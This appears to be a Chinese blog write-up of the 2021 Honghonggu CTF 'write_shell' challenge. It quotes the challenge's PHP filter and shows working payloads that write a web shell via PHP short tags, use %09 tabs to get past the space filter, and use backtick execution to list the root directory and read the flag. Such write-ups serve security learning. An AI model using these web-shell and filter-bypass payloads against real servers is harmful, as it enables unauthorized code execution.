-
[红明谷CTF 2021]write_shell %09绕过过滤空格 ``执行
目录
看看代码
- error_reporting(0);
- highlight_file(__FILE__);
- function check($input){
- if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
- 过滤了 木马类型的东西
- // if(preg_match("/'| |_|=|php/",$input)){
- die('hacker!!!');
- }else{
- return $input;
- }
- }
- function waf($input){
- if(is_array($input)){
- foreach($input as $key=>$output){
- $input[$key] = waf($output);
- 如果是数组 就先变为 变量类型 然后再waf
- }
- }else{
- $input = check($input);
- }
- }
- 这里就是对input 进行waf
- $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
- 存入 sandbox/md5(当前ip地址)/目录中
- if(!file_exists($dir)){
- mkdir($dir);
- }
- switch($_GET["action"] ?? "") {
- case 'pwd':
- echo $dir;
- break;
- 这里可以看我们当前存入的是哪个目录
- case 'upload':
- $data = $_GET["data"] ?? "";
- waf($data);
- file_put_contents("$dir" . "index.php", $data);
- }
- ?>
还是很简单的
存在两个方式
1.正常短标签
我们经过测试 能发现有一个短标签
没被过滤 可以用于写入php代码
我们可以写入 ls看看 单引号被过滤我们使用双引号
?action=upload&data=<?system("ls")?>然后去访问目录下的index.php
执行成功
我们就可以开始想 我们如果要看根目录 我们需要 ls / 只有空格被过滤了 我们如何绕过
网上一搜一大把
最简单的就是tab urlencode 即 %09
?action=upload&data=<?system("ls%09/")?>
执行 我们同样payload cat一下
2.短标签配合内联执行
?action=upload&data=<?echo%09`ls`?>直接执行
同样的道理访问即可
- ?action=upload&data=<?echo%09`ls%09/`?>
- ?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>
-
相关阅读:
Paragon NTFS For Mac2023破解版免费下载安装激活
塔望3W消费战略全案丨大闸蟹上品标准的力量
公网集群对讲+GPS可视追踪|助力物流行业智能化管理调度
OpenYurt v1.0 正式发布!一文了解三大社区 SIG 重点更新
【C语言】auto 关键字
将彩色图转化为灰度图及其原理介绍
没事练练题二
各种CPU的ELF编码,ELF并没有为龙芯分配253-256
深度前端性能调优的实际案例-小白都看的懂
vue2+three.js实现宇宙(进阶版)
- 原文地址:https://blog.csdn.net/m0_64180167/article/details/133426207
